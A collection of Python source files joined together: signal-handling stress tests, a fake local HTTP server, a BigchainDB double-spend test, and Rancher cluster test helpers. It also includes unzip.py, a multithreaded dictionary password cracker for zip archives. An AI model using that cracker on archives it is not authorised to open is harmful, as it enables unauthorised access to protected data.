%s" % (signum, blocked)) if old_mask ^ blocked != {signum}: raise Exception("%s ^ %s != {%s}" % (old_mask, blocked, signum)) # Unblock SIGUSR1 try: # unblock the pending signal calls immediately the signal handler signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum]) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") try: kill(signum) except ZeroDivisionError: pass else: raise Exception("ZeroDivisionError not raised") # Check the new mask unblocked = read_sigmask() if signum in unblocked: raise Exception("%s in %s" % (signum, unblocked)) if blocked ^ unblocked != {signum}: raise Exception("%s ^ %s != {%s}" % (blocked, unblocked, signum)) if old_mask != unblocked: raise Exception("%s != %s" % (old_mask, unblocked)) """ assert_python_ok('-c', code) @unittest.skipUnless(hasattr(signal, 'pthread_kill'), 'need signal.pthread_kill()') def test_pthread_kill_main_thread(self): # Test that a signal can be sent to the main thread with pthread_kill() # before any other thread has been created (see issue #12392). code = """if True: import threading import signal import sys def handler(signum, frame): sys.exit(3) signal.signal(signal.SIGUSR1, handler) signal.pthread_kill(threading.get_ident(), signal.SIGUSR1) sys.exit(2) """ with spawn_python('-c', code) as process: stdout, stderr = process.communicate() exitcode = process.wait() if exitcode != 3: raise Exception("Child error (exit code %s): %s" % (exitcode, stdout)) class StressTest(unittest.TestCase): """ Stress signal delivery, especially when a signal arrives in the middle of recomputing the signal state or executing previously tripped signal handlers. """ def setsig(self, signum, handler): old_handler = signal.signal(signum, handler) self.addCleanup(signal.signal, signum, old_handler) def measure_itimer_resolution(self): N = 20 times = [] def handler(signum=None, frame=None): if len(times) < N: times.append(time.perf_counter()) # 1 µs is the smallest possible timer interval, # we want to measure what the concrete duration # will be on this platform signal.setitimer(signal.ITIMER_REAL, 1e-6) self.addCleanup(signal.setitimer, signal.ITIMER_REAL, 0) self.setsig(signal.SIGALRM, handler) handler() while len(times) < N: time.sleep(1e-3) durations = [times[i+1] - times[i] for i in range(len(times) - 1)] med = statistics.median(durations) if support.verbose: print("detected median itimer() resolution: %.6f s." % (med,)) return med def decide_itimer_count(self): # Some systems have poor setitimer() resolution (for example # measured around 20 ms. on FreeBSD 9), so decide on a reasonable # number of sequential timers based on that. reso = self.measure_itimer_resolution() if reso <= 1e-4: return 10000 elif reso <= 1e-2: return 100 else: self.skipTest("detected itimer resolution (%.3f s.) too high " "(> 10 ms.) on this platform (or system too busy)" % (reso,)) @unittest.skipUnless(hasattr(signal, "setitimer"), "test needs setitimer()") def test_stress_delivery_dependent(self): """ This test uses dependent signal handlers. """ N = self.decide_itimer_count() sigs = [] def first_handler(signum, frame): # 1e-6 is the minimum non-zero value for `setitimer()`. # Choose a random delay so as to improve chances of # triggering a race condition. Ideally the signal is received # when inside critical signal-handling routines such as # Py_MakePendingCalls(). signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5) def second_handler(signum=None, frame=None): sigs.append(signum) # Here on Linux, SIGPROF > SIGALRM > SIGUSR1. By using both # ascending and descending sequences (SIGUSR1 then SIGALRM, # SIGPROF then SIGALRM), we maximize chances of hitting a bug. self.setsig(signal.SIGPROF, first_handler) self.setsig(signal.SIGUSR1, first_handler) self.setsig(signal.SIGALRM, second_handler) # for ITIMER_REAL expected_sigs = 0 deadline = time.monotonic() + 15.0 while expected_sigs < N: os.kill(os.getpid(), signal.SIGPROF) expected_sigs += 1 # Wait for handlers to run to avoid signal coalescing while len(sigs) < expected_sigs and time.monotonic() < deadline: time.sleep(1e-5) os.kill(os.getpid(), signal.SIGUSR1) expected_sigs += 1 while len(sigs) < expected_sigs and time.monotonic() < deadline: time.sleep(1e-5) # All ITIMER_REAL signals should have been delivered to the # Python handler self.assertEqual(len(sigs), N, "Some signals were lost") @unittest.skipUnless(hasattr(signal, "setitimer"), "test needs setitimer()") def test_stress_delivery_simultaneous(self): """ This test uses simultaneous signal handlers. """ N = self.decide_itimer_count() sigs = [] def handler(signum, frame): sigs.append(signum) self.setsig(signal.SIGUSR1, handler) self.setsig(signal.SIGALRM, handler) # for ITIMER_REAL expected_sigs = 0 deadline = time.monotonic() + 15.0 while expected_sigs < N: # Hopefully the SIGALRM will be received somewhere during # initial processing of SIGUSR1. signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5) os.kill(os.getpid(), signal.SIGUSR1) expected_sigs += 2 # Wait for handlers to run to avoid signal coalescing while len(sigs) < expected_sigs and time.monotonic() < deadline: time.sleep(1e-5) # All ITIMER_REAL signals should have been delivered to the # Python handler self.assertEqual(len(sigs), N, "Some signals were lost") # TODO: RUSTPYTHON @unittest.expectedFailure @unittest.skipUnless(hasattr(signal, "SIGUSR1"), "test needs SIGUSR1") def test_stress_modifying_handlers(self): # bpo-43406: race condition between trip_signal() and signal.signal signum = signal.SIGUSR1 num_sent_signals = 0 num_received_signals = 0 do_stop = False def custom_handler(signum, frame): nonlocal num_received_signals num_received_signals += 1 def set_interrupts(): nonlocal num_sent_signals while not do_stop: signal.raise_signal(signum) num_sent_signals += 1 def cycle_handlers(): while num_sent_signals < 100: for i in range(20000): # Cycle between a Python-defined and a non-Python handler for handler in [custom_handler, signal.SIG_IGN]: signal.signal(signum, handler) old_handler = signal.signal(signum, custom_handler) self.addCleanup(signal.signal, signum, old_handler) t = threading.Thread(target=set_interrupts) try: ignored = False with support.catch_unraisable_exception() as cm: t.start() cycle_handlers() do_stop = True t.join() if cm.unraisable is not None: # An unraisable exception may be printed out when # a signal is ignored due to the aforementioned # race condition, check it. self.assertIsInstance(cm.unraisable.exc_value, OSError) self.assertIn( f"Signal {signum} ignored due to race condition", str(cm.unraisable.exc_value)) ignored = True # bpo-43406: Even if it is unlikely, it's technically possible that # all signals were ignored because of race conditions. if not ignored: # Sanity check that some signals were received, but not all self.assertGreater(num_received_signals, 0) self.assertLess(num_received_signals, num_sent_signals) finally: do_stop = True t.join() class RaiseSignalTest(unittest.TestCase): # TODO: RUSTPYTHON @unittest.expectedFailure def test_sigint(self): with self.assertRaises(KeyboardInterrupt): signal.raise_signal(signal.SIGINT) # TODO: RUSTPYTHON @unittest.expectedFailure @unittest.skipIf(sys.platform != "win32", "Windows specific test") def test_invalid_argument(self): try: SIGHUP = 1 # not supported on win32 signal.raise_signal(SIGHUP) self.fail("OSError (Invalid argument) expected") except OSError as e: if e.errno == errno.EINVAL: pass else: raise # TODO: RUSTPYTHON @unittest.expectedFailure def test_handler(self): is_ok = False def handler(a, b): nonlocal is_ok is_ok = True old_signal = signal.signal(signal.SIGINT, handler) self.addCleanup(signal.signal, signal.SIGINT, old_signal) signal.raise_signal(signal.SIGINT) self.assertTrue(is_ok) def tearDownModule(): support.reap_children() if __name__ == "__main__": unittest.main()
httpserver.py
# Copyright 2014 The LUCI Authors. All rights reserved. # Use of this source code is governed under the Apache License, Version 2.0 # that can be found in the LICENSE file. import json import logging import threading from six.moves import BaseHTTPServer from six.moves import http_client _STOP_EVENT = '/fakeserver/__stop__' class Handler(BaseHTTPServer.BaseHTTPRequestHandler): """Handlers implements utility functions to help implementing a fake.""" ### Public methods def send_json(self, data): """Sends a JSON response.""" self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() self.wfile.write(json.dumps(data).encode()) def send_octet_stream(self, data, headers=None): """Sends a binary response.""" self.send_response(200) self.send_header('Content-type', 'application/octet-stream') for key, value in (headers or {}).items(): self.send_header(key, value) self.end_headers() self.wfile.write(data) def read_body(self): """Reads the request body.""" return self.rfile.read(int(self.headers['Content-Length'])) def yield_body(self): """Yields the request body as 4kiB chunks.""" size = int(self.headers['Content-Length']) while size: chunk = min(4096, size) yield self.rfile.read(chunk) size -= chunk ### Overrides from BaseHTTPRequestHandler def do_OPTIONS(self): if self.path == _STOP_EVENT: self.server.parent._stopped = True self.send_octet_stream(b'') def log_message(self, fmt, *args): logging.info( '%s - - [%s] %s', self.address_string(), self.log_date_time_string(), fmt % args) class Server(object): """Server implements a simple HTTP server to implement a fake.""" _HANDLER_CLS = None def __init__(self): assert issubclass(self._HANDLER_CLS, Handler), self._HANDLER_CLS self._closed = False self._stopped = False self._server = BaseHTTPServer.HTTPServer( ('127.0.0.1', 0), self._HANDLER_CLS) self._server.parent = self self._server.url = self.url = 'http://127.0.0.1:%d' % ( self._server.server_port) self._thread = threading.Thread(target=self._run, name='httpd') self._thread.daemon = True self._thread.start() logging.info('%s', self.url) def close(self): assert not self._closed self._closed = True self._send_event(_STOP_EVENT) self._thread.join() def _run(self): while not self._stopped: self._server.handle_request() self._server.server_close() def _send_event(self, path): conn = http_client.HTTPConnection( '127.0.0.1:%d' % self._server.server_port, timeout=60) try: conn.request('OPTIONS', path) conn.getresponse() finally: conn.close()
unzip.py
#!/usr/bin/env python import zipfile, optparse from threading import Thread def banner(): print "[***] Unzipper p29 [***]" print "" def extractFile(zFile, password): try: zFile.extractall(pwd=password) print "[+] Found password"+password+"\n" except: pass def main(): banner() parser = optparse.OptionParser("usage%prog "+"-f <zipfile> -d <dictionary>") parser.add_option('-f', dest='zname', type='string', help='specify zip file') parser.add_option('-d', dest='dname', type='string', help='specify dictionary file') (options, args) = parser.parse_args() if (options.zname == None) |(options.dname == None): print parser.usage exit(0) else: zname = options.zname dname = options.dname zFile = zipfile.ZipFile(zname) passFile = open(dname) for line in passFile.readlines(): password = line.strip('\n') t = Thread(target=extractFile, args=(zFile, password)) t.start() if __name__ == '__main__': main()
test_double_spend.py
# Copyright BigchainDB GmbH and BigchainDB contributors # SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0) # Code is Apache-2.0 and docs are CC-BY-4.0 # # Double Spend testing # This test challenge the system with double spends. import os from uuid import uuid4 from threading import Thread import queue import bigchaindb_driver.exceptions from bigchaindb_driver import BigchainDB from bigchaindb_driver.crypto import generate_keypair def test_double_create(): bdb = BigchainDB(os.environ.get('BIGCHAINDB_ENDPOINT')) alice = generate_keypair() results = queue.Queue() tx = bdb.transactions.fulfill( bdb.transactions.prepare( operation='CREATE', signers=alice.public_key, asset={'data': {'uuid': str(uuid4())}}), private_keys=alice.private_key) def send_and_queue(tx): try: bdb.transactions.send(tx) results.put('OK') except bigchaindb_driver.exceptions.TransportError as e: results.put('FAIL') t1 = Thread(target=send_and_queue, args=(tx, )) t2 = Thread(target=send_and_queue, args=(tx, )) t1.start() t2.start() results = [results.get(timeout=2), results.get(timeout=2)] assert results.count('OK') == 1 assert results.count('FAIL') == 1
common.py
import inspect import json import os import random import subprocess import ssl import time import requests import ast import paramiko import rancher import pytest from urllib.parse import urlparse from rancher import ApiError from lib.aws import AmazonWebServices from copy import deepcopy from threading import Lock from threading import Thread import websocket import base64 DEFAULT_TIMEOUT = 120 DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300 DEFAULT_APP_DELETION_TIMEOUT = 360 DEFAULT_MONITORING_TIMEOUT = 180 DEFAULT_CATALOG_TIMEOUT = 15 CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "") CATTLE_API_URL = CATTLE_TEST_URL + "/v3" CATTLE_AUTH_URL = \ CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login" ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None") USER_TOKEN = os.environ.get('USER_TOKEN', "None") USER_PASSWORD = os.environ.get('USER_PASSWORD', "None") ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None") kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)), "k8s_kube_config") MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200")) TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux") TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer") TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx") TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu") if TEST_OS == "windows": DEFAULT_TIMEOUT = 300 skip_test_windows_os = pytest.mark.skipif( TEST_OS == "windows", reason='Tests Skipped for including Windows nodes cluster') CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "") RANCHER_CLEANUP_CLUSTER = \ ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True")) env_file = os.path.join( os.path.dirname(os.path.realpath(__file__)), "rancher_env.config") AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID") AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY") AWS_REGION = os.environ.get("AWS_REGION") AWS_SUBNET = os.environ.get("AWS_SUBNET") AWS_VPC = os.environ.get("AWS_VPC") AWS_SG = os.environ.get("AWS_SG") AWS_ZONE = os.environ.get("AWS_ZONE") AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "") AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "") AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "") LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None") NFS_SERVER_MOUNT_PATH = "/nfs" TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False")) if_test_rbac = pytest.mark.skipif(TEST_RBAC is False, reason='rbac tests are skipped') TEST_ALL_SNAPSHOT = ast.literal_eval( os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False") ) if_test_all_snapshot = \ pytest.mark.skipif(TEST_ALL_SNAPSHOT is False, reason='Snapshots check tests are skipped') DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'resource') # As of release 2.4 default rke scan profile is "rke-cis-1.4" CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4") # here are all supported roles for RBAC testing CLUSTER_MEMBER = "cluster-member" CLUSTER_OWNER = "cluster-owner" PROJECT_MEMBER = "project-member" PROJECT_OWNER = "project-owner" PROJECT_READ_ONLY = "read-only" rbac_data = { "project": None, "namespace": None, "workload": None, "p_unshared": None, "ns_unshared": None, "wl_unshared": None, "users": { CLUSTER_OWNER: {}, CLUSTER_MEMBER: {}, PROJECT_OWNER: {}, PROJECT_MEMBER: {}, PROJECT_READ_ONLY: {}, } } auth_rbac_data = { "project": None, "namespace": None, "users": {} } # here are the global role templates used for # testing globalRoleBinding and groupRoleBinding TEMPLATE_MANAGE_CATALOG = { "newUserDefault": "false", "rules": [ { "type": "/v3/schemas/policyRule", "apiGroups": [ "management.cattle.io" ], "verbs": [ "*" ], "resources": [ "catalogs", "templates", "templateversions" ] } ], "name": "gr-test-manage-catalog", } TEMPLATE_LIST_CLUSTER = { "newUserDefault": "false", "rules": [ { "type": "/v3/schemas/policyRule", "apiGroups": [ "management.cattle.io" ], "verbs": [ "get", "list", "watch" ], "resources": [ "clusters" ] } ], "name": "gr-test-list-cluster", } # this is used when testing users from a auth provider AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "") if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]: pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: " "activeDirectory, freeIpa, or openLdap (case sensitive).") NESTED_GROUP_ENABLED = ast.literal_eval( os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False")) # Admin Auth username and the shared password for all auth users AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "") # the link to log in as an auth user LOGIN_AS_AUTH_USER_URL = \ CATTLE_TEST_URL + "/v3-public/" \ + AUTH_PROVIDER + "Providers/" \ + AUTH_PROVIDER.lower() + "?action=login" CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search" # This is used for nested group when a third part Auth is enabled nested_group = { "auth_info": None, "users": None, "group_dic": None, "groups": None } auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD if_test_group_rbac = pytest.mark.skipif( auth_requirements, reason='Group RBAC tests are skipped.' 'Required AUTH env variables ' 'have not been set.' ) def is_windows(os_type=TEST_OS): return os_type == "windows" def random_str(): return 'random-{0}-{1}'.format(random_num(), int(time.time())) def random_num(): return random.randint(0, 1000000) def random_int(start, end): return random.randint(start, end) def random_test_name(name="test"): return name + "-" + str(random_int(10000, 99999)) def get_admin_client(): return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False) def get_user_client(): return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False) def get_client_for_token(token, url=CATTLE_API_URL): return rancher.Client(url=url, token=token, verify=False) def get_project_client_for_token(project, token): p_url = project.links['self'] + '/schemas' p_client = rancher.Client(url=p_url, token=token, verify=False) return p_client def get_cluster_client_for_token(cluster, token): c_url = cluster.links['self'] + '/schemas' c_client = rancher.Client(url=c_url, token=token, verify=False) return c_client def up(cluster, token): c_url = cluster.links['self'] + '/schemas' c_client = rancher.Client(url=c_url, token=token, verify=False) return c_client def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT): wait_for(lambda: client.reload(obj).state == state, timeout) return client.reload(obj) def wait_for_condition(client, resource, check_function, fail_handler=None, timeout=DEFAULT_TIMEOUT): start = time.time() resource = client.reload(resource) while not check_function(resource): if time.time() - start > timeout: exceptionMsg = 'Timeout waiting for ' + resource.baseType + \ ' to satisfy condition: ' + \ inspect.getsource(check_function) if fail_handler: exceptionMsg = exceptionMsg + fail_handler(resource) raise Exception(exceptionMsg) time.sleep(.5) resource = client.reload(resource) return resource def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None): start = time.time() ret = callback() while ret is None or ret is False: time.sleep(.5) if time.time() - start > timeout: if timeout_message: raise Exception(timeout_message) else: raise Exception('Timeout waiting for condition') ret = callback() return ret def random_name(): return "test" + "-" + str(random_int(10000, 99999)) def get_setting_value_by_name(name): settings_url = CATTLE_API_URL + "/settings/" + name head = {'Authorization': 'Bearer ' + ADMIN_TOKEN} response = requests.get(settings_url, verify=False, headers=head) return response.json()["value"] # Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2 def compare_versions(v1, v2): if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))): return 1 elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))): return -1 else: return 0 def create_project_and_ns(token, cluster, project_name=None, ns_name=None): server_url = cluster.links['self'].split("/clusters")[0] client = get_client_for_token(token, server_url) p = create_project(client, cluster, project_name) c_client = get_cluster_client_for_token(cluster, token) ns = create_ns(c_client, cluster, p, ns_name) return p, ns def create_project(client, cluster, project_name=None): if project_name is None: project_name = random_name() p = client.create_project(name=project_name, clusterId=cluster.id) time.sleep(5) p = wait_until_available(client, p) assert p.state == 'active' return p def create_project_with_pspt(client, cluster, pspt): p = client.create_project(name=random_name(), clusterId=cluster.id) p = wait_until_available(client, p) assert p.state == 'active' return set_pspt_for_project(p, client, pspt) def set_pspt_for_project(project, client, pspt): project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id) project = wait_until_available(client, project) assert project.state == 'active' return project def create_ns(client, cluster, project, ns_name=None): if ns_name is None: ns_name = random_name() ns = client.create_namespace(name=ns_name, clusterId=cluster.id, projectId=project.id) wait_for_ns_to_become_active(client, ns) ns = client.reload(ns) assert ns.state == 'active' return ns def assign_members_to_cluster(client, user, cluster, role_template_id): crtb = client.create_cluster_role_template_binding( clusterId=cluster.id, roleTemplateId=role_template_id, subjectKind="User", userId=user.id) return crtb def assign_members_to_project(client, user, project, role_template_id): prtb = client.create_project_role_template_binding( projectId=project.id, roleTemplateId=role_template_id, subjectKind="User", userId=user.id) return prtb def change_member_role_in_cluster(client, user, crtb, role_template_id): crtb = client.update( crtb, roleTemplateId=role_template_id, userId=user.id) return crtb def change_member_role_in_project(client, user, prtb, role_template_id): prtb = client.update( prtb, roleTemplateId=role_template_id, userId=user.id) return prtb def create_kubeconfig(cluster, file_name=kube_fname): generateKubeConfigOutput = cluster.generateKubeconfig() print(generateKubeConfigOutput.config) file = open(file_name, "w") file.write(generateKubeConfigOutput.config) file.close() def validate_psp_error_worklaod(p_client, workload, error_message): workload = wait_for_wl_transitioning(p_client, workload) assert workload.state == "updating" assert workload.transitioning == "error" print(workload.transitioningMessage) assert error_message in workload.transitioningMessage def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1, ignore_pod_count=False, deployment_list=None, daemonset_list=None, cronjob_list=None): if cronjob_list is None: cronjob_list = [] if daemonset_list is None: daemonset_list = [] if deployment_list is None: deployment_list = [] workload_list = deployment_list + daemonset_list + cronjob_list wls = project_client.list_workload(namespaceId=ns.id).data assert len(workload_list) == len(wls), \ "Expected {} workload(s) to be present in {} namespace " \ "but there were {}".format(len(workload_list), ns.name, len(wls)) for workload_name in workload_list: workloads = project_client.list_workload(name=workload_name, namespaceId=ns.id).data assert len(workloads) == workload_list.count(workload_name), \ "Expected {} workload(s) to be present with name {} " \ "but there were {}".format(workload_list.count(workload_name), workload_name, len(workloads)) for workload in workloads: for container in workload.containers: assert str(container.image).startswith("rancher/") if workload_name in deployment_list: validate_workload(project_client, workload, "deployment", ns.name, pod_count=pod_count, ignore_pod_count=ignore_pod_count) deployment_list.remove(workload_name) if workload_name in daemonset_list: validate_workload(project_client, workload, "daemonSet", ns.name, pod_count=pod_count, ignore_pod_count=ignore_pod_count) daemonset_list.remove(workload_name) if workload_name in cronjob_list: validate_workload(project_client, workload, "cronJob", ns.name, pod_count=pod_count, ignore_pod_count=ignore_pod_count) cronjob_list.remove(workload_name) # Final assertion to ensure all expected workloads have been validated assert not deployment_list + daemonset_list + cronjob_list def validate_workload(p_client, workload, type, ns_name, pod_count=1, wait_for_cron_pods=60, ignore_pod_count=False): workload = wait_for_wl_to_active(p_client, workload) assert workload.state == "active" # For cronjob, wait for the first pod to get created after # scheduled wait time if type == "cronJob": time.sleep(wait_for_cron_pods) if ignore_pod_count: pods = p_client.list_pod(workloadId=workload.id).data else: pods = wait_for_pods_in_workload(p_client, workload, pod_count) assert len(pods) == pod_count pods = p_client.list_pod(workloadId=workload.id).data assert len(pods) == pod_count for pod in pods: p = wait_for_pod_to_running(p_client, pod) assert p["status"]["phase"] == "Running" wl_result = execute_kubectl_cmd( "get " + type + " " + workload.name + " -n " + ns_name) if type == "deployment" or type == "statefulSet": assert wl_result["status"]["readyReplicas"] == len(pods) if type == "daemonSet": assert wl_result["status"]["currentNumberScheduled"] == len(pods) if type == "cronJob": assert len(wl_result["status"]["active"]) >= len(pods) def validate_workload_with_sidekicks(p_client, workload, type, ns_name, pod_count=1): workload = wait_for_wl_to_active(p_client, workload) assert workload.state == "active" pods = wait_for_pods_in_workload(p_client, workload, pod_count) assert len(pods) == pod_count for pod in pods: wait_for_pod_to_running(p_client, pod) wl_result = execute_kubectl_cmd( "get " + type + " " + workload.name + " -n " + ns_name) assert wl_result["status"]["readyReplicas"] == pod_count for key, value in workload.workloadLabels.items(): label = key + "=" + value get_pods = "get pods -l" + label + " -n " + ns_name execute_kubectl_cmd(get_pods) pods_result = execute_kubectl_cmd(get_pods) assert len(pods_result["items"]) == pod_count for pod in pods_result["items"]: assert pod["status"]["phase"] == "Running" assert len(pod["status"]["containerStatuses"]) == 2 assert "running" in pod["status"]["containerStatuses"][0]["state"] assert "running" in pod["status"]["containerStatuses"][1]["state"] def validate_workload_paused(p_client, workload, expectedstatus): workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused assert workloadStatus == expectedstatus def validate_pod_images(expectedimage, workload, ns_name): for key, value in workload.workloadLabels.items(): label = key + "=" + value get_pods = "get pods -l" + label + " -n " + ns_name pods = execute_kubectl_cmd(get_pods) for pod in pods["items"]: assert pod["spec"]["containers"][0]["image"] == expectedimage def validate_pods_are_running_by_id(expectedpods, workload, ns_name): for key, value in workload.workloadLabels.items(): label = key + "=" + value get_pods = "get pods -l" + label + " -n " + ns_name pods = execute_kubectl_cmd(get_pods) curpodnames = [] for pod in pods["items"]: curpodnames.append(pod["metadata"]["name"]) for expectedpod in expectedpods["items"]: assert expectedpod["metadata"]["name"] in curpodnames def validate_workload_image(client, workload, expectedImage, ns): workload = client.list_workload(uuid=workload.uuid).data[0] assert workload.containers[0].image == expectedImage validate_pod_images(expectedImage, workload, ns.name) def execute_kubectl_cmd(cmd, json_out=True, stderr=False, kubeconfig=kube_fname): command = 'kubectl --kubeconfig {0} {1}'.format( kubeconfig, cmd) if json_out: command += ' -o json' print("run cmd: \t{0}".format(command)) if stderr: result = run_command_with_stderr(command, False) else: result = run_command(command, False) print("returns: \t{0}".format(result)) if json_out: result = json.loads(result) return result def run_command(command, log_out=True): if log_out: print("run cmd: \t{0}".format(command)) try: return subprocess.check_output(command, shell=True, text=True) except subprocess.CalledProcessError as e: return None def run_command_with_stderr(command, log_out=True): if log_out: print("run cmd: \t{0}".format(command)) try: output = subprocess.check_output(command, shell=True, stderr=subprocess.PIPE) returncode = 0 except subprocess.CalledProcessError as e: output = e.stderr returncode = e.returncode if log_out: print("return code: \t{0}".format(returncode)) if returncode != 0: print("output: \t{0}".format(output)) return output def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT): start = time.time() workloads = client.list_workload(uuid=workload.uuid).data assert len(workloads) == 1 wl = workloads[0] while wl.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) workloads = client.list_workload(uuid=workload.uuid).data assert len(workloads) == 1 wl = workloads[0] return wl def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT): start = time.time() ingresses = client.list_ingress(uuid=ingress.uuid).data assert len(ingresses) == 1 wl = ingresses[0] while wl.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) ingresses = client.list_ingress(uuid=ingress.uuid).data assert len(ingresses) == 1 wl = ingresses[0] return wl def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT, state="error"): start = time.time() workloads = client.list_workload(uuid=workload.uuid).data assert len(workloads) == 1 wl = workloads[0] while wl.transitioning != state: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) workloads = client.list_workload(uuid=workload.uuid).data assert len(workloads) == 1 wl = workloads[0] return wl def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT): start = time.time() pods = client.list_pod(uuid=pod.uuid).data assert len(pods) == 1 p = pods[0] while p.state != "running": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) pods = client.list_pod(uuid=pod.uuid).data assert len(pods) == 1 p = pods[0] return p def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS): if not client: client = get_user_client() nodes = client.list_node(clusterId=cluster.id).data schedulable_nodes = [] for node in nodes: if node.worker and (not node.unschedulable): for key, val in node.labels.items(): # Either one of the labels should be present on the node if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os': if val == os_type: schedulable_nodes.append(node) break # Including master in list of nodes as master is also schedulable if 'k3s' in cluster.version["gitVersion"] and node.controlPlane: schedulable_nodes.append(node) return schedulable_nodes def get_etcd_nodes(cluster, client=None): if not client: client = get_user_client() nodes = client.list_node(clusterId=cluster.id).data etcd_nodes = [] for node in nodes: if node.etcd: etcd_nodes.append(node) return etcd_nodes def get_role_nodes(cluster, role, client=None): etcd_nodes = [] control_nodes = [] worker_nodes = [] node_list = [] if not client: client = get_user_client() nodes = client.list_node(clusterId=cluster.id).data for node in nodes: if node.etcd: etcd_nodes.append(node) if node.controlPlane: control_nodes.append(node) if node.worker: worker_nodes.append(node) if role == "etcd": node_list = etcd_nodes if role == "control": node_list = control_nodes if role == "worker": node_list = worker_nodes return node_list def validate_ingress(p_client, cluster, workloads, host, path, insecure_redirect=False): time.sleep(10) curl_args = " " if (insecure_redirect): curl_args = " -L --insecure " if len(host) > 0: curl_args += " --header 'Host: " + host + "'" nodes = get_schedulable_nodes(cluster, os_type="linux") target_name_list = get_target_names(p_client, workloads) for node in nodes: host_ip = resolve_node_ip(node) url = "http://" + host_ip + path if not insecure_redirect: wait_until_ok(url, timeout=300, headers={ "Host": host }) cmd = curl_args + " " + url validate_http_response(cmd, target_name_list) def validate_ingress_using_endpoint(p_client, ingress, workloads, timeout=300, certcheck=False, is_insecure=False): target_name_list = get_target_names(p_client, workloads) start = time.time() fqdn_available = False url = None while not fqdn_available: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for endpoint to be available") time.sleep(.5) ingress_list = p_client.list_ingress(uuid=ingress.uuid).data assert len(ingress_list) == 1 ingress = ingress_list[0] if hasattr(ingress, 'publicEndpoints'): for public_endpoint in ingress.publicEndpoints: if public_endpoint["hostname"].startswith(ingress.name) \ or certcheck: fqdn_available = True url = \ public_endpoint["protocol"].lower() + "://" + \ public_endpoint["hostname"] if "path" in public_endpoint.keys(): url += public_endpoint["path"] time.sleep(10) validate_http_response(url, target_name_list, insecure=is_insecure) def get_target_names(p_client, workloads): pods = [] for workload in workloads: pod_list = p_client.list_pod(workloadId=workload.id).data pods.extend(pod_list) target_name_list = [] for pod in pods: target_name_list.append(pod.name) print("target name list:" + str(target_name_list)) return target_name_list def get_endpoint_url_for_workload(p_client, workload, timeout=600): fqdn_available = False url = "" start = time.time() while not fqdn_available: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for endpoint to be available") time.sleep(.5) workload_list = p_client.list_workload(uuid=workload.uuid).data assert len(workload_list) == 1 workload = workload_list[0] if hasattr(workload, 'publicEndpoints'): assert len(workload.publicEndpoints) > 0 url = "http://" url = url + workload.publicEndpoints[0]["addresses"][0] + ":" url = url + str(workload.publicEndpoints[0]["port"]) fqdn_available = True return url def wait_until_lb_is_active(url, timeout=300): start = time.time() while check_for_no_access(url): time.sleep(.5) print("No access yet") if time.time() - start > 